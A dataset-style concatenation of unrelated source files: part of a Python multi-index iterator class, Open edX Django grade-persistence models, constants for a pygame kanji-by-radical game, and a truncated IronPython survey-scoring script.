# Increase index in the dimension we build the chain
z[d] += 1
# Check if we are done with the current base point
# If yes, move base point and start a new chain
if z[d] > bounds[d] - 2:
z[d] = 0
z[d - 1] += 1
for i in reversed(range(d)):
if z[i] > bounds[i] - 1:
z[i] = 0
z[i - 1] += 1
return index_iterator_chain(direction)
def _get_index_iterator_mag(self):
r"""
"""
# Nodes sorted by l_1 magnitude
nodes = sorted(self._lima.keys(), key=sum)
def index_iterator_mag(nodes):
for node in nodes:
yield node
return index_iterator_mag(nodes)
def get_node_iterator(self, mode="lex", direction=None):
r"""
Returns an iterator to iterate over all basis elements :math:`k`.
        :param mode: The mode by which we iterate over the indices. Default is 'lex'
                     for lexicographical order. Also supported are 'chain' for
                     the chain-like mode (see the manual for details) and 'mag'
                     for iteration ordered by the :math:`l_1` magnitude (the sum)
                     of the multi-index.
:type mode: string
:param direction: If iterating in `chainmode` this specifies the direction
the chains go.
:type direction: integer.
"""
if mode == "lex":
return self._get_index_iterator_lex()
elif mode == "chain":
if direction < self._dimension:
return self._get_index_iterator_chain(direction=direction)
else:
raise ValueError("Can not build chain iterator for this direction.")
elif mode == "mag":
return self._get_index_iterator_mag()
# TODO: Consider boundary node only iterator
else:
raise ValueError("Unknown iterator mode: {}.".format(mode))
def get_limits(self):
r"""Returns the upper limit :math:`K_d` for all directions :math:`d`.
:return: A tuple of the maximum of the multi-index in each direction.
"""
return tuple(self._limits)
def get_neighbours(self, k, selection=None, direction=None):
r"""
Returns a list of all multi-indices that are neighbours of a given
multi-index :math:`k`. A direct neighbour is defined as
:math:`(k_0, \ldots, k_d \pm 1, \ldots, k_{D-1}) \forall d \in [0 \ldots D-1]`.
:param k: The multi-index of which we want to get the neighbours.
:type k: tuple
:param selection:
:type selection: string with fixed values ``forward``, ``backward`` or ``all``.
The values ``all`` is equivalent to the value ``None`` (default).
:param direction: The direction :math:`0 \leq d < D` in which we want to find
the neighbours :math:`k \pm e_d`.
:type direction: int
:return: A list containing the pairs :math:`(d, k^\prime)`.
"""
assert len(tuple(k)) == self._dimension
# First build a list of potential neighbours
I = eye(self._dimension, dtype=integer)
ki = vstack(k)
# Forward and backward direct neighbours
nbfw = ki + I
nbbw = ki - I
# Keep only the valid ones
nbh = []
if direction is not None:
directions = [direction]
else:
directions = range(self._dimension)
for d in directions:
nfw = tuple(nbfw[:, d])
nbw = tuple(nbbw[:, d])
# TODO: Try to simplify these nested if blocks
if selection in ("backward", "all", None):
if nbw in self:
nbh.append((d, nbw))
if selection in ("forward", "all", None):
if nfw in self:
nbh.append((d, nfw))
return nbh
def find_largest_index(self):
r"""
Find the index :math:`k \in \mathfrak{K}` with maximal distance
:math:`\sum_{d=0}^D k_d^2` from the zero index. In case of
multiple maxima the method returns the first one found.
"""
return tuple(array(self._limits) - 1)
| bsd-3-clause | 7,798,054,498,354,863,000 | 32.29 | 115 | 0.542105 | false |
stvstnfrd/edx-platform | lms/djangoapps/grades/models.py | 1 | 30802 | """
Models used for robust grading.
Robust grading allows student scores to be saved per-subsection independent
of any changes that may occur to the course after the score is achieved.
We also persist students' course-level grades, and update them whenever
a student's score or the course grading policy changes. As they are
persisted, course grades are also immune to changes in course content.
"""
import json
import logging
from base64 import b64encode
from collections import defaultdict, namedtuple
from hashlib import sha1
from django.apps import apps
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user, unused-import
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.timezone import now
from lazy import lazy
from model_utils.models import TimeStampedModel
from opaque_keys.edx.django.models import CourseKeyField, UsageKeyField
from opaque_keys.edx.keys import CourseKey, UsageKey
from simple_history.models import HistoricalRecords
from lms.djangoapps.courseware.fields import UnsignedBigIntAutoField
from lms.djangoapps.grades import constants, events # lint-amnesty, pylint: disable=unused-import
from openedx.core.lib.cache_utils import get_cache
log = logging.getLogger(__name__)
BLOCK_RECORD_LIST_VERSION = 1
# Used to serialize information about a block at the time it was used in
# grade calculation.
BlockRecord = namedtuple('BlockRecord', ['locator', 'weight', 'raw_possible', 'graded'])
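# Illustrative example (not from the original source): a single record might
# look like BlockRecord(locator=<UsageKey>, weight=1.0, raw_possible=10.0,
# graded=True); BlockRecordList below wraps an ordered tuple of such records.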
class BlockRecordList:
"""
An immutable ordered list of BlockRecord objects.
"""
def __init__(self, blocks, course_key, version=None):
self.blocks = tuple(blocks)
self.course_key = course_key
self.version = version or BLOCK_RECORD_LIST_VERSION
def __eq__(self, other):
assert isinstance(other, BlockRecordList)
return self.json_value == other.json_value
def __hash__(self):
"""
        Returns an integer hash value of this
        list of block records, as required by Python.
"""
return hash(self.hash_value)
def __iter__(self):
return iter(self.blocks)
def __len__(self):
return len(self.blocks)
@lazy
def hash_value(self):
"""
Returns a hash value of the list of block records.
This currently hashes using sha1, and returns a base64 encoded version
of the binary digest. In the future, different algorithms could be
        supported by adding a label indicating which algorithm was used, e.g.,
"sha256$j0NDRmSPa5bfid2pAcUXaxCm2Dlh3TwayItZstwyeqQ=".
"""
return b64encode(sha1(self.json_value.encode('utf-8')).digest()).decode('utf-8')
@lazy
def json_value(self):
"""
Return a JSON-serialized version of the list of block records, using a
stable ordering.
"""
list_of_block_dicts = [block._asdict() for block in self.blocks]
for block_dict in list_of_block_dicts:
block_dict['locator'] = str(block_dict['locator']) # BlockUsageLocator is not json-serializable
data = {
'blocks': list_of_block_dicts,
'course_key': str(self.course_key),
'version': self.version,
}
return json.dumps(
data,
separators=(',', ':'), # Remove spaces from separators for more compact representation
sort_keys=True,
)
@classmethod
def from_json(cls, blockrecord_json):
"""
Return a BlockRecordList from previously serialized json.
"""
data = json.loads(blockrecord_json)
course_key = CourseKey.from_string(data['course_key'])
block_dicts = data['blocks']
record_generator = (
BlockRecord(
locator=UsageKey.from_string(block["locator"]).replace(course_key=course_key),
weight=block["weight"],
raw_possible=block["raw_possible"],
graded=block["graded"],
)
for block in block_dicts
)
return cls(record_generator, course_key, version=data['version'])
@classmethod
def from_list(cls, blocks, course_key):
"""
Return a BlockRecordList from the given list and course_key.
"""
return cls(blocks, course_key)
@python_2_unicode_compatible
class VisibleBlocks(models.Model):
"""
A django model used to track the state of a set of visible blocks under a
given subsection at the time they are used for grade calculation.
This state is represented using an array of BlockRecord, stored
in the blocks_json field. A hash of this json array is used for lookup
purposes.
.. no_pii:
"""
blocks_json = models.TextField()
hashed = models.CharField(max_length=100, unique=True)
course_id = CourseKeyField(blank=False, max_length=255, db_index=True)
_CACHE_NAMESPACE = "grades.models.VisibleBlocks"
class Meta:
app_label = "grades"
def __str__(self):
"""
String representation of this model.
"""
return f"VisibleBlocks object - hash:{self.hashed}, raw json:'{self.blocks_json}'"
@property
def blocks(self):
"""
Returns the blocks_json data stored on this model as a list of
BlockRecords in the order they were provided.
"""
return BlockRecordList.from_json(self.blocks_json)
@classmethod
def bulk_read(cls, user_id, course_key):
"""
Reads and returns all visible block records for the given user and course from
the cache. The cache is initialized with the visible blocks for this user and
course if no entry currently exists.
        Arguments:
            user_id: The id of the user whose block records are desired
            course_key: The course identifier for the desired records
"""
prefetched = get_cache(cls._CACHE_NAMESPACE).get(cls._cache_key(user_id, course_key), None)
if prefetched is None:
prefetched = cls._initialize_cache(user_id, course_key)
return prefetched
@classmethod
def cached_get_or_create(cls, user_id, blocks):
"""
Given a ``user_id`` and a ``BlockRecordList`` object, attempts to
fetch the related VisibleBlocks model from the request cache. This
will create and save a new ``VisibleBlocks`` record if no record
exists corresponding to the hash_value of ``blocks``.
"""
prefetched = get_cache(cls._CACHE_NAMESPACE).get(cls._cache_key(user_id, blocks.course_key))
if prefetched is not None:
model = prefetched.get(blocks.hash_value)
if not model:
# We still have to do a get_or_create, because
# another user may have had this block hash created,
# even if the user we checked the cache for hasn't yet.
model, _ = cls.objects.get_or_create(
hashed=blocks.hash_value, blocks_json=blocks.json_value, course_id=blocks.course_key,
)
cls._update_cache(user_id, blocks.course_key, [model])
else:
model, _ = cls.objects.get_or_create(
hashed=blocks.hash_value,
defaults={'blocks_json': blocks.json_value, 'course_id': blocks.course_key},
)
return model
@classmethod
def bulk_create(cls, user_id, course_key, block_record_lists):
"""
Bulk creates VisibleBlocks for the given iterator of
BlockRecordList objects and updates the VisibleBlocks cache
for the block records' course with the new VisibleBlocks.
Returns the newly created visible blocks.
"""
created = cls.objects.bulk_create([
VisibleBlocks(
blocks_json=brl.json_value,
hashed=brl.hash_value,
course_id=course_key,
)
for brl in block_record_lists
])
cls._update_cache(user_id, course_key, created)
return created
@classmethod
def bulk_get_or_create(cls, user_id, course_key, block_record_lists):
"""
Bulk creates VisibleBlocks for the given iterator of
BlockRecordList objects for the given user and course_key, but
only for those that aren't already created.
"""
cached_records = cls.bulk_read(user_id, course_key)
non_existent_brls = {brl for brl in block_record_lists if brl.hash_value not in cached_records}
cls.bulk_create(user_id, course_key, non_existent_brls)
@classmethod
def _initialize_cache(cls, user_id, course_key):
"""
        Prefetches visible blocks for the given user and course and stores them in the cache.
Returns a dictionary mapping hashes of these block records to the
block record objects.
"""
grades_with_blocks = PersistentSubsectionGrade.objects.select_related('visible_blocks').filter(
user_id=user_id,
course_id=course_key,
)
prefetched = {grade.visible_blocks.hashed: grade.visible_blocks for grade in grades_with_blocks}
get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(user_id, course_key)] = prefetched
return prefetched
@classmethod
def _update_cache(cls, user_id, course_key, visible_blocks):
"""
Adds a specific set of visible blocks to the request cache.
This assumes that prefetch has already been called.
"""
get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(user_id, course_key)].update(
{visible_block.hashed: visible_block for visible_block in visible_blocks}
)
@classmethod
def _cache_key(cls, user_id, course_key):
return f"visible_blocks_cache.{course_key}.{user_id}"
@python_2_unicode_compatible
class PersistentSubsectionGrade(TimeStampedModel):
"""
A django model tracking persistent grades at the subsection level.
.. no_pii:
"""
class Meta:
app_label = "grades"
unique_together = [
# * Specific grades can be pulled using all three columns,
# * Progress page can pull all grades for a given (course_id, user_id)
# * Course staff can see all grades for a course using (course_id,)
('course_id', 'user_id', 'usage_key'),
]
# Allows querying in the following ways:
# (modified): find all the grades updated within a certain timespan
# (modified, course_id): find all the grades updated within a timespan for a certain course
# (modified, course_id, usage_key): find all the grades updated within a timespan for a subsection
# in a course
# (first_attempted, course_id, user_id): find all attempted subsections in a course for a user
# (first_attempted, course_id): find all attempted subsections in a course for all users
index_together = [
('modified', 'course_id', 'usage_key'),
('first_attempted', 'course_id', 'user_id')
]
# primary key will need to be large for this table
id = UnsignedBigIntAutoField(primary_key=True) # pylint: disable=invalid-name
user_id = models.IntegerField(blank=False)
course_id = CourseKeyField(blank=False, max_length=255)
# note: the usage_key may not have the run filled in for
# old mongo courses. Use the full_usage_key property
# instead when you want to use/compare the usage_key.
usage_key = UsageKeyField(blank=False, max_length=255)
# Information relating to the state of content when grade was calculated
subtree_edited_timestamp = models.DateTimeField('Last content edit timestamp', blank=True, null=True)
course_version = models.CharField('Guid of latest course version', blank=True, max_length=255)
# earned/possible refers to the number of points achieved and available to achieve.
# graded refers to the subset of all problems that are marked as being graded.
earned_all = models.FloatField(blank=False)
possible_all = models.FloatField(blank=False)
earned_graded = models.FloatField(blank=False)
possible_graded = models.FloatField(blank=False)
# timestamp for the learner's first attempt at content in
# this subsection. If null, indicates no attempt
# has yet been made.
first_attempted = models.DateTimeField(null=True, blank=True)
# track which blocks were visible at the time of grade calculation
visible_blocks = models.ForeignKey(VisibleBlocks, db_column='visible_blocks_hash', to_field='hashed',
on_delete=models.CASCADE)
_CACHE_NAMESPACE = 'grades.models.PersistentSubsectionGrade'
@property
def full_usage_key(self):
"""
Returns the "correct" usage key value with the run filled in.
"""
if self.usage_key.run is None: # lint-amnesty, pylint: disable=no-member
# pylint: disable=unexpected-keyword-arg,no-value-for-parameter
return self.usage_key.replace(course_key=self.course_id)
else:
return self.usage_key
def __str__(self):
"""
Returns a string representation of this model.
"""
return (
"{} user: {}, course version: {}, subsection: {} ({}). {}/{} graded, {}/{} all, first_attempted: {}"
).format(
type(self).__name__,
self.user_id,
self.course_version,
self.usage_key,
self.visible_blocks_id,
self.earned_graded,
self.possible_graded,
self.earned_all,
self.possible_all,
self.first_attempted,
)
@classmethod
def prefetch(cls, course_key, users):
"""
Prefetches grades for the given users in the given course.
"""
cache_key = cls._cache_key(course_key)
get_cache(cls._CACHE_NAMESPACE)[cache_key] = defaultdict(list)
cached_grades = get_cache(cls._CACHE_NAMESPACE)[cache_key]
queryset = cls.objects.select_related('visible_blocks', 'override').filter(
user_id__in=[user.id for user in users],
course_id=course_key,
)
for record in queryset:
cached_grades[record.user_id].append(record)
@classmethod
def clear_prefetched_data(cls, course_key):
"""
Clears prefetched grades for this course from the RequestCache.
"""
get_cache(cls._CACHE_NAMESPACE).pop(cls._cache_key(course_key), None)
@classmethod
def read_grade(cls, user_id, usage_key):
"""
Reads a grade from database
Arguments:
user_id: The user associated with the desired grade
usage_key: The location of the subsection associated with the desired grade
Raises PersistentSubsectionGrade.DoesNotExist if applicable
"""
return cls.objects.select_related('visible_blocks', 'override').get(
user_id=user_id,
course_id=usage_key.course_key, # course_id is included to take advantage of db indexes
usage_key=usage_key,
)
@classmethod
def bulk_read_grades(cls, user_id, course_key):
"""
Reads all grades for the given user and course.
Arguments:
user_id: The user associated with the desired grades
course_key: The course identifier for the desired grades
"""
try:
prefetched_grades = get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(course_key)]
try:
return prefetched_grades[user_id]
except KeyError:
# The user's grade is not in the cached dict of subsection grades,
# so return an empty list.
return []
except KeyError:
# subsection grades were not prefetched for the course, so get them from the DB
return cls.objects.select_related('visible_blocks', 'override').filter(
user_id=user_id,
course_id=course_key,
)
@classmethod
def update_or_create_grade(cls, **params):
"""
Wrapper for objects.update_or_create.
"""
cls._prepare_params(params)
VisibleBlocks.cached_get_or_create(params['user_id'], params['visible_blocks'])
cls._prepare_params_visible_blocks_id(params)
# TODO: do we NEED to pop these?
first_attempted = params.pop('first_attempted')
user_id = params.pop('user_id')
usage_key = params.pop('usage_key')
grade, _ = cls.objects.update_or_create(
user_id=user_id,
course_id=usage_key.course_key,
usage_key=usage_key,
defaults=params,
)
# TODO: Remove as part of EDUCATOR-4602.
if str(usage_key.course_key) == 'course-v1:UQx+BUSLEAD5x+2T2019':
log.info('Created/updated grade ***{}*** for user ***{}*** in course ***{}***'
'for subsection ***{}*** with default params ***{}***'
.format(grade, user_id, usage_key.course_key, usage_key, params))
grade.override = PersistentSubsectionGradeOverride.get_override(user_id, usage_key)
if first_attempted is not None and grade.first_attempted is None:
grade.first_attempted = first_attempted
grade.save()
cls._emit_grade_calculated_event(grade)
return grade
@classmethod
def bulk_create_grades(cls, grade_params_iter, user_id, course_key):
"""
Bulk creation of grades.
"""
if not grade_params_iter:
return
PersistentSubsectionGradeOverride.prefetch(user_id, course_key)
list(map(cls._prepare_params, grade_params_iter))
VisibleBlocks.bulk_get_or_create(
user_id, course_key, [params['visible_blocks'] for params in grade_params_iter]
)
list(map(cls._prepare_params_visible_blocks_id, grade_params_iter))
grades = [PersistentSubsectionGrade(**params) for params in grade_params_iter]
grades = cls.objects.bulk_create(grades)
for grade in grades:
cls._emit_grade_calculated_event(grade)
return grades
@classmethod
def _prepare_params(cls, params):
"""
Prepares the fields for the grade record.
"""
if not params.get('course_id', None):
params['course_id'] = params['usage_key'].course_key
params['course_version'] = params.get('course_version', None) or ""
params['visible_blocks'] = BlockRecordList.from_list(params['visible_blocks'], params['course_id'])
@classmethod
def _prepare_params_visible_blocks_id(cls, params):
"""
Prepares the visible_blocks_id field for the grade record,
using the hash of the visible_blocks field. Specifying
the hashed field eliminates extra queries to get the
VisibleBlocks record. Use this variation of preparing
the params when you are sure of the existence of the
VisibleBlock.
"""
params['visible_blocks_id'] = params['visible_blocks'].hash_value
del params['visible_blocks']
@staticmethod
def _emit_grade_calculated_event(grade):
events.subsection_grade_calculated(grade)
@classmethod
def _cache_key(cls, course_id):
return f"subsection_grades_cache.{course_id}"
@python_2_unicode_compatible
class PersistentCourseGrade(TimeStampedModel):
"""
A django model tracking persistent course grades.
.. no_pii:
"""
class Meta:
app_label = "grades"
# Indices:
# (course_id, user_id) for individual grades
# (course_id) for instructors to see all course grades, implicitly created via the unique_together constraint
# (user_id) for course dashboard; explicitly declared as an index below
# (passed_timestamp, course_id) for tracking when users first earned a passing grade.
# (modified): find all the grades updated within a certain timespan
# (modified, course_id): find all the grades updated within a certain timespan for a course
unique_together = [
('course_id', 'user_id'),
]
index_together = [
('passed_timestamp', 'course_id'),
('modified', 'course_id')
]
# primary key will need to be large for this table
id = UnsignedBigIntAutoField(primary_key=True) # pylint: disable=invalid-name
user_id = models.IntegerField(blank=False, db_index=True)
course_id = CourseKeyField(blank=False, max_length=255)
# Information relating to the state of content when grade was calculated
course_edited_timestamp = models.DateTimeField('Last content edit timestamp', blank=True, null=True)
course_version = models.CharField('Course content version identifier', blank=True, max_length=255)
grading_policy_hash = models.CharField('Hash of grading policy', blank=False, max_length=255)
# Information about the course grade itself
percent_grade = models.FloatField(blank=False)
letter_grade = models.CharField('Letter grade for course', blank=False, max_length=255)
# Information related to course completion
passed_timestamp = models.DateTimeField('Date learner earned a passing grade', blank=True, null=True)
_CACHE_NAMESPACE = "grades.models.PersistentCourseGrade"
def __str__(self):
"""
Returns a string representation of this model.
"""
return ', '.join([
"{} user: {}".format(type(self).__name__, self.user_id),
f"course version: {self.course_version}",
f"grading policy: {self.grading_policy_hash}",
f"percent grade: {self.percent_grade}%",
f"letter grade: {self.letter_grade}",
f"passed timestamp: {self.passed_timestamp}",
])
@classmethod
def prefetch(cls, course_id, users):
"""
Prefetches grades for the given users for the given course.
"""
get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(course_id)] = {
grade.user_id: grade
for grade in
cls.objects.filter(user_id__in=[user.id for user in users], course_id=course_id)
}
@classmethod
def clear_prefetched_data(cls, course_key):
"""
Clears prefetched grades for this course from the RequestCache.
"""
get_cache(cls._CACHE_NAMESPACE).pop(cls._cache_key(course_key), None)
@classmethod
def read(cls, user_id, course_id):
"""
Reads a grade from database
Arguments:
user_id: The user associated with the desired grade
course_id: The id of the course associated with the desired grade
Raises PersistentCourseGrade.DoesNotExist if applicable
"""
try:
prefetched_grades = get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(course_id)]
try:
return prefetched_grades[user_id]
except KeyError:
# user's grade is not in the prefetched dict, so
# assume they have no grade
raise cls.DoesNotExist # lint-amnesty, pylint: disable=raise-missing-from
except KeyError:
# grades were not prefetched for the course, so fetch it
return cls.objects.get(user_id=user_id, course_id=course_id)
@classmethod
def update_or_create(cls, user_id, course_id, **kwargs):
"""
Creates a course grade in the database.
        Returns a PersistentCourseGrade object.
"""
passed = kwargs.pop('passed')
if kwargs.get('course_version', None) is None:
kwargs['course_version'] = ""
grade, _ = cls.objects.update_or_create(
user_id=user_id,
course_id=course_id,
defaults=kwargs
)
if passed and not grade.passed_timestamp:
grade.passed_timestamp = now()
grade.save()
cls._emit_grade_calculated_event(grade)
cls._update_cache(course_id, user_id, grade)
return grade
@classmethod
def _update_cache(cls, course_id, user_id, grade):
course_cache = get_cache(cls._CACHE_NAMESPACE).get(cls._cache_key(course_id))
if course_cache is not None:
course_cache[user_id] = grade
@classmethod
def _cache_key(cls, course_id):
return f"grades_cache.{course_id}"
@staticmethod
def _emit_grade_calculated_event(grade):
events.course_grade_calculated(grade)
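# Illustrative sketch of the write/read flow above; `user`, `course_key` and the
# grade values are hypothetical placeholders, not values from this module:
#
#   PersistentCourseGrade.update_or_create(
#       user.id, course_key,
#       percent_grade=0.83, letter_grade='B', passed=True,
#       grading_policy_hash='...',
#   )
#   grade = PersistentCourseGrade.read(user.id, course_key)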
@python_2_unicode_compatible
class PersistentSubsectionGradeOverride(models.Model):
"""
A django model tracking persistent grades overrides at the subsection level.
.. no_pii:
"""
class Meta:
app_label = "grades"
grade = models.OneToOneField(PersistentSubsectionGrade, related_name='override', on_delete=models.CASCADE)
# Created/modified timestamps prevent race-conditions when using with async rescoring tasks
created = models.DateTimeField(auto_now_add=True, db_index=True)
modified = models.DateTimeField(auto_now=True, db_index=True)
# earned/possible refers to the number of points achieved and available to achieve.
# graded refers to the subset of all problems that are marked as being graded.
earned_all_override = models.FloatField(null=True, blank=True)
possible_all_override = models.FloatField(null=True, blank=True)
earned_graded_override = models.FloatField(null=True, blank=True)
possible_graded_override = models.FloatField(null=True, blank=True)
# store the source of the system that caused the override
system = models.CharField(max_length=100, blank=True, null=True)
# store the reason for the override
override_reason = models.CharField(max_length=300, blank=True, null=True)
_CACHE_NAMESPACE = "grades.models.PersistentSubsectionGradeOverride"
# This is necessary because CMS does not install the grades app, but it
# imports this models code. Simple History will attempt to connect to the installed
# model in the grades app, which will fail.
if 'grades' in apps.app_configs:
history = HistoricalRecords()
_history_user = None
def __str__(self):
return ', '.join([
"{}".format(type(self).__name__),
f"earned_all_override: {self.earned_all_override}",
f"possible_all_override: {self.possible_all_override}",
f"earned_graded_override: {self.earned_graded_override}",
f"possible_graded_override: {self.possible_graded_override}",
])
def get_history(self):
return self.history.all() # pylint: disable=no-member
@classmethod
def prefetch(cls, user_id, course_key):
get_cache(cls._CACHE_NAMESPACE)[(user_id, str(course_key))] = {
override.grade.usage_key: override
for override in
cls.objects.filter(grade__user_id=user_id, grade__course_id=course_key)
}
@classmethod
def get_override(cls, user_id, usage_key): # lint-amnesty, pylint: disable=missing-function-docstring
prefetch_values = get_cache(cls._CACHE_NAMESPACE).get((user_id, str(usage_key.course_key)), None)
if prefetch_values is not None:
return prefetch_values.get(usage_key)
try:
return cls.objects.get(
grade__user_id=user_id,
grade__course_id=usage_key.course_key,
grade__usage_key=usage_key,
)
except PersistentSubsectionGradeOverride.DoesNotExist:
pass
@classmethod
def update_or_create_override(
cls, requesting_user, subsection_grade_model, feature=None, action=None, **override_data # lint-amnesty, pylint: disable=unused-argument
):
"""
Creates or updates an override object for the given PersistentSubsectionGrade.
Args:
requesting_user: The user that is creating the override.
subsection_grade_model: The PersistentSubsectionGrade object associated with this override.
override_data: The parameters of score values used to create the override record.
"""
grade_defaults = cls._prepare_override_params(subsection_grade_model, override_data)
        grade_defaults['override_reason'] = override_data.get('comment')
        grade_defaults['system'] = override_data.get('system')
# TODO: Remove as part of EDUCATOR-4602.
if str(subsection_grade_model.course_id) == 'course-v1:UQx+BUSLEAD5x+2T2019':
log.info('Creating override for user ***{}*** for PersistentSubsectionGrade'
'***{}*** with override data ***{}*** and derived grade_defaults ***{}***.'
.format(requesting_user, subsection_grade_model, override_data, grade_defaults))
try:
override = PersistentSubsectionGradeOverride.objects.get(grade=subsection_grade_model)
for key, value in grade_defaults.items():
setattr(override, key, value)
except PersistentSubsectionGradeOverride.DoesNotExist:
override = PersistentSubsectionGradeOverride(grade=subsection_grade_model, **grade_defaults)
if requesting_user:
# setting this on a non-field attribute which simple
# history reads from to determine which user to attach to
# the history row
override._history_user = requesting_user # pylint: disable=protected-access
override.save()
return override
@staticmethod
def _prepare_override_params(subsection_grade_model, override_data):
"""
Helper method to strip any grade override field names that won't work
as defaults when calling PersistentSubsectionGradeOverride.update_or_create(),
and to use default values from the associated PersistentSubsectionGrade
for any override fields that are not specified.
"""
allowed_fields_and_defaults = {
'earned_all_override': 'earned_all',
'possible_all_override': 'possible_all',
'earned_graded_override': 'earned_graded',
'possible_graded_override': 'possible_graded',
}
cleaned_data = {}
for override_field_name, field_name in allowed_fields_and_defaults.items():
cleaned_data[override_field_name] = override_data.get(
override_field_name,
getattr(subsection_grade_model, field_name)
)
return cleaned_data
| agpl-3.0 | -3,658,550,487,341,594,600 | 39.002597 | 145 | 0.635218 | false |
josephnavarro/kanji-radical-reading | constant.py | 1 | 3287 | #!/usr/bin/env python
import os
## Constants
## Constant values used in other files
TITLE = "Kanji by Radical" ## Window caption
SIZE = W,H = 800,600 ## Screen size
SMALL = W*2//3, H*2//3 ## Small screen
FPS = 60 ## Screen refresh rate
FONTSIZE = 108
BLACK = (0,0,0)
RED = (255,0,0)
WHITE = (255,255,255)
ANGLE = 3.75
SCALE = 1.5
MINISCALE = 0.8
KANJISIZE = 128,128
WORD_LONG = 8
## Font sizes
TEXT_LG = 90
TEXT_MD = 40
TEXT_DF = 40
TEXT_DD = 35
TEXT_SM = 36
DEF_ANGLE = -6
## GUI button placement
KANJI_VERT = [H//4 for n in range(2)]
KANJI_HORZ = [32+W*3//18, 32+W*8//18]
MAIN_BUTTON_HORZ = [64, W//2 + 64]
MAIN_BUTTON_VERT = [H//2 + 64 for n in range(2)]
BUTTON_HORZ = [480 for n in range(3)] ## Button x-coordinates
BUTTON_VERT = [32 + 176 * n for n in range(3)] ## Button y-coordinates
## Finite state machine game modes
MODE_TITLE = 'title' ## Game title screen
MODE_STAGE = 'select' ## Game stage selection
MODE_INTERMEDIATE = 'intermediate'
## Different types of game modes
MODE_ONYOMI = 'onyomi' ## On'yomi given (choose radical)
MODE_RADICAL = 'radical' ## Radical given (choose on'yomi)
## Vertical pixel offset when a button is pressed
OFFSET_Y = 120
PRESS_X = 8
PRESS_Y = 8
## Folder hierarchy
DIR_ROOT = 'res'
DIR_FONT = 'font'
DIR_IMG = 'img'
DIR_KANJI = 'kanji'
DIR_RADICAL = 'radical'
DIR_BASE = 'base'
DIR_DATA = 'data'
DIR_SOUND = 'snd'
## Files
FILE_BASE = 'base.config'
FILE_DEFINITION = 'definition.config'
FILE_TITLE = 'title.png'
BUTTON_IMG1A = 'button1a.png'
BUTTON_IMG1B = 'button1b.png'
BUTTON_IMG2A = 'button2a.png'
BUTTON_IMG2B = 'button2b.png'
BUTTON_IMG3A = 'button3a.png'
BUTTON_IMG3B = 'button3b.png'
BUTTON_IMG4A = 'button4a.png'
BUTTON_IMG4B = 'button4b.png'
DAGGER_IMG = 'dagger.png'
CHAR_KAN = 'kan.png'
CHAR_KEN = 'ken.png'
CHAR_SEI = 'sei.png'
GAME_BACKGROUND1 = 'game1.png'
GAME_BACKGROUND2 = 'game2.png'
ICONFILE = 'icon.png'
BGM_FILE = 'bgm.ogg'
SFX1_FILE = 'sfx1.ogg'
SFX2_FILE = 'sfx2.ogg'
## Parser delimiters
DASH = '-'
FILE = '.'
SPACE = '_'
COLON = ':'
COMMA = ','
PNGWILD = '/*.png'
## Image paths
BGPATH1 = os.path.join(DIR_ROOT, DIR_IMG, GAME_BACKGROUND1)
BGPATH2 = os.path.join(DIR_ROOT, DIR_IMG, GAME_BACKGROUND2)
BGM_PATH = os.path.join(DIR_ROOT, DIR_SOUND, BGM_FILE)
SFX1_PATH = os.path.join(DIR_ROOT, DIR_SOUND, SFX1_FILE)
SFX2_PATH = os.path.join(DIR_ROOT, DIR_SOUND, SFX2_FILE)
ICONPATH = os.path.join(DIR_ROOT, DIR_IMG, ICONFILE)
DGPATH = os.path.join(DIR_ROOT, DIR_IMG, DAGGER_IMG)
BTNPATH1 = [
os.path.join(DIR_ROOT, DIR_IMG, BUTTON_IMG3A),
os.path.join(DIR_ROOT, DIR_IMG, BUTTON_IMG3B),
]
BTNPATH2 = [
os.path.join(DIR_ROOT, DIR_IMG, BUTTON_IMG4A),
os.path.join(DIR_ROOT, DIR_IMG, BUTTON_IMG4B),
]
KANPATH = os.path.join(DIR_ROOT, DIR_RADICAL, CHAR_KAN)
KENPATH = os.path.join(DIR_ROOT, DIR_RADICAL, CHAR_KEN)
SEIPATH = os.path.join(DIR_ROOT, DIR_RADICAL, CHAR_SEI)
## Dagger animation constants
START_POS = [
]
## Dictionary keys
KEY_NONE = 'none'
KEY_FULL = 'full'
KEY_OTHER = 'other'
| mit | 3,822,552,664,235,857,400 | 26.165289 | 75 | 0.613021 | false |
manologomez/Vulcano | support/calculo_redes.py | 1 | 2923 | # -*- coding: utf-8 -*-
import sys
import re
import clr
from utilidades import *
from System import DateTime, Guid
from Vulcano.Engine import *#RepoGeneral, AppNotifier
from Vulcano.App import *
def evaluar_script(code, val, _data):
data = _data
hoy = DateTime.Now
return eval(code)
def match_valor(var, valor, data):
e = cadena(valor)
for pos in var.Valores:
if var.EsScript:
if evaluar_script(pos.Expresion, valor, data):
return pos.Puntajes
else:
for p in pos.Expresion.split(','):
if e == p: return pos.Puntajes
return None
def especial_por(valor):
numero = getNumero(valor)
if numero == None: return None
if numero < 1: numero = numero*100
if numero <= 0: return 'sin servicio'
if numero > 80: return 'alta'
if numero > 50 and numero <= 80: return 'moderada'
if numero < 50: return 'baja'
return None
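# Worked examples of the thresholds above (illustrative only):
#   especial_por(0.85) -> scaled to 85 -> 'alta'
#   especial_por(65)   -> 'moderada'
#   especial_por(30)   -> 'baja'
#   especial_por(0)    -> 'sin servicio'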
# works the same as the catalogs, for now
def transform(valor, var):
txt = valor.strip().lower()
if txt == 'hi': txt = 'ac'
if var.Codigo == 'intervencion':
if txt == 'personal y equipos necesarios': txt = 'alta'
if var.ValorEnPosibles(txt): return txt
for p in var.Valores:
if p.Descripcion.lower() == txt:
return p.Expresion
return None
def correr():
print " A procesar %s" % fuentes.Count
total = 0
for fuente in fuentes:
f = {}
f.update(fuente)
if not proc.MapaFichas.ContainsKey(fuente.Tipo):
continue
#print fuente.Tipo, f
ficha = proc.MapaFichas[fuente.Tipo]
res = proc.CrearResultado(fuente)
data = {}
for var in ficha.Variables.Values:
cod = var.Codigo
data[cod] = None
valor = cadena(f[cod])
if not valor or valor == '': continue
if var.Codigo == "cobertura":
valor = especial_por(f[cod])
else:
valor = transform(valor, var)
data[cod] = valor
completos = 0
for (k,v) in data.iteritems():
det = proc.CrearDetalle(res, "evaluacion", k, cadena(v))
det.Valor_numerico = getNumero(v)
res.AddDetalle(det)
if v == None or v == '':
continue
completos += 1
		# quality
